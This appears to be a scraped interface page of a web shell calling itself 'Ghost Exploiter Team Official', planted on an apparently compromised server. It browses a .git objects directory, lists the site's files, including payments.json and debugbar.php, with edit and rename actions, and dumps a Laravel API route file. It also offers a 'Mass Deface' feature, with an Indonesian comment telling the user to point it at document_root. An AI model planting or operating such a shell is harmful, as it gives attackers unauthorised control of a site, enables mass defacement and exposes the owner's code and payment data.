Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
.git
/
objects
/
7f
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
composer.json
1.513KB
edt
ren
contragents.php
0.699KB
edt
ren
debugbar-20260128175343
...
13.946KB
edt
ren
debugbar.php
13.946KB
edt
ren
default.conf
0.759KB
edt
ren
index.html
0.435KB
edt
ren
packed-refs
0.548KB
edt
ren
payments.json
5.348KB
edt
ren
stash
0.04KB
edt
ren
<?php declare(strict_types=1); use App\Http\Controllers\Api\V1\ContragentsController; use Illuminate\Support\Facades\Route; Route::group(['prefix' => '/v1/contragents', 'middleware' => 'auth:sanctum'], function (): void { Route::get('{modelID}/with-payments', [ContragentsController::class,'contragentsWithPayments']); Route::get('{modelID}/list', [ContragentsController::class,'index']); Route::get('{modelID}/{id}', [ContragentsController::class,'show']); Route::post('{modelID}/create', [ContragentsController::class,'store']); Route::post('{modelID}/{id}/update', [ContragentsController::class,'update']); Route::delete('{modelID}/{id}', [ContragentsController::class,'destroy']); });